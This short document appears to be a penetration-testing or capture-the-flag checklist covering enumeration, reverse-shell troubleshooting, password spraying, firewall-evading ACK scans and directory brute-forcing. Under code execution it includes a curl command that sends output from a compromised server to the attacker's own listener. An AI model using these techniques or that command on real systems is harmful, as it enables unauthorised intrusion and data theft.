Enumeration

• You can read arbi­trary files. 
  • Can you upload as well somehow? 
    • Via anoth­er port maybe?
  • Deter­mine inter­est­ing files for the giv­en technique
  • Per­form blind enu­mer­a­tion for the OS
• You have a port, but no clue what it does.
  • Start Wire­shark first
  • Check the port num­ber in the web.
  • Try a default HTTP request.
  • Add a very large input.
  • Scan with ‑sA ACK scan to cir­cum­vent a pos­si­ble firewall.
• You have a password: 
  • Try Pass­word spraying
• You have an image file 
  • Check exif
  • Check steghide

Code execution

• You have a blind code exe­cu­tion which does­n’t always works? 
  • Try to deter­mine if there are some bad characters.
• You does­n’t get a reverse shell. 
  • Try anoth­er port. Use a port which is open for inbound traffic.
  • Are you using the cor­rect architecture?
• You exe­cut­ed some­thing on a serv­er, which did­n’t worked, but you don’t know why? 
  • Try to redi­rect STDERR and STDOUT.
  • Try to redi­rect it and also print it to a local nc lis­ten­er like this:
    ./wontworkonavictim &> /tmp/output; curl --data @/tmp/output http://$ownip:5555/

I am stuck

• HTTP
  • Tried to search with­in direc­to­ries with gob­uster and/or with file suffixes?
  • Oth­er wordlists?